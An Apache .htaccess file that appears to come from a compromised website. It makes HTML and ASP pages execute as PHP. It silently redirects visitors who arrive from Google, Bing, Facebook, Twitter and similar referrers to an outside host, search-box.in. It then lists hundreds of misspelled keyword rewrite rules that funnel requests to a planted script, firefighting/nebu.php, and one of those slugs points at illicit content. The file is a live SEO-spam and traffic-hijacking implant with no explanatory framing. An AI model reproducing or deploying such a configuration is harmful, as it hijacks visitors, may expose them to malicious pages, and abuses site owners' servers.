AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*\/images.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*\/imgres.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*news.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*maps.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=1110 [R,L]

RewriteEngine on
RewriteRule check_work/$ ./firefighting/nebu.php?checkwork
RewriteRule terraza-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule jacky-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule knaar-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule mechanisam-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule systems-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dives-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule lolicontube-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule alyson-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule halers-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule bullmastiff-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule villan-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule chabge-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hybridbikes-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule classifications-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule accecorys-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule axlel-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule harlet-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule amoxicillan-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule airsstream-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule loud-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule tailor-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule califonia-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule alphagoldr-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule weeps-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule mathilda-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule shox-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule centerpiecces-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule sculp-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule siemen-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule abris-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule leonard-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule protractor-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule flooe-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule austrain-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule crafting-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule bantas-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule baffel-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule digitize-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule screenpacks-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule angican-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule athelon-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule tranfermer-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule gitar-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule winterising-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule repilca-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule aroused-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule containing-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule swinn-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule woodards-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hiltbrunner-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule sahajanand-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule thombhole-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule laponia-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule minot-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule exteral-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule laplacian-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule angelique-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hypoglycemia-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule extender-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule australia-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule tracotrs-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ignitioncoil-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule vinylroll-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule nyk-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule acoustical-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dreses-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fine-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule gaer-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule muff-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule rainsoft-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule porcilen-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule retracting-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule darango-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule camtower-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule damen-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule telestra-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule columbine-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule sockey-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule sanderson-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule mola-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule slovania-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule geko-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule refusal-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule germeny-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule vela-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule brookside-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule girs-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule gena-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule resigns-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule probles-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule rousch-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule aucrura-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule renaissance-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule puppys-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule tickethorse-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hyperlite-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule commings-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule avenida-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule combien-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule versos-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule loye-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule pomegranate-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule kool-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule lemay-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule wahiawa-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule travelmate-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule alfabetul-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule siveraldo-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule bolle-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule humpimg-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule visor-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule poisoned-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule petrova-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule permission-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule glenbrook-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule vernors-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule kvainverter-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule cuvert-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule pintal-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule assosiasion-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule honourable-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule aftermaeket-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule edge-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule homeline-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule columba-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule antifreez-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule rayron-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fah-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule roxy-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hazlehurst-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule windrider-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule amphibious-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule netscreen-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule faek-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule licsense-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule xcel-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule electracraft-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ponyboy-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule descirptive-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dior-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule miute-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule victoia-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fwy-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule gleco-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule puge-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule giantess-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule sepan-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule chalboard-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule alereo-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule cobramatic-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule extoics-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fnm-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule skirt-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule shevi-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule inositol-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule flares-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule amaretti-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule bouroham-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule volo-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule becks-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule damond-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule cumputer-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule suliction-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule customs-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule agencies-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule medicin-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule secretarial-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hammerhead-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule bardot-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ececutive-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule crows-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ameristep-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule neuter-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule subways-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule apatheid-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule adolesence-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule asphalting-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule gigabite-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule grading-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule unrepairable-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule encuentra-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule stiry-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ridg-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule barok-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule poter-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule crankposition-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule mandoa-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule navidenos-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule codec-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule bluish-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule longbeach-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule roneak-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fltwheel-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule shorts-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule restaur-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule aromatic-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule altoona-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule holser-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule quinto-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule evaluations-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule gyromatic-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule gamble-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule crewcap-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule barona-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule swowmobile-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule otes-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule wargame-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule telehandler-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule stainlees-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule oceanic-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dispensacion-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule priceless-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule redhill-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule norweigan-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule depreciation-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule tental-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule altornator-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dragracing-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule schuman-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule indon-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule spurs-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule prasekolah-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule superstitious-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule eploded-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ordinance-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dslam-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule homeopath-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule swirls-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule spoilerhole-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule eca-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule antonello-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule esi-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule finsih-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule kmp-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ranch-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule chjristmas-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule conclave-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule forcast-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule tapers-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule huskie-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule barret-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ireladn-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dsb-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule blueing-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule centurian-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule plaits-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hacen-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dyse-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fugitive-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule corpuschrish-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule intrum-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule katalena-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule assist-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule wgt-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule pumpwiring-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule minds-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule neutrality-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ofdm-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ball-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule weblogic-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule strowger-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule whatisit-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule navyblue-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule eku-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fmfc-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule palau-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule danali-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fahenheit-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule asymbly-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule dreambook-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule perc-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule wellsaw-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule otrage-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule courtroom-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hikoilu-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule hypokalemia-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule russis-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule minnisota-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule corivett-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule nitual-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule unheat-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule synchronization-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule mtw-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule zeland-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule fxe-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule villanova-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule coz-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule calico-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule cyberdyne-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule modena-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule wonderlandbook-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule castelli-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule ribbon-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule spection-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule achville-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule columia-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule sportsmanonline-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule bigsby-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule naped-(.*)/$ ./firefighting/nebu.php?$1
RewriteRule alikes-(.*)/$ ./firefighting/nebu.php?$1
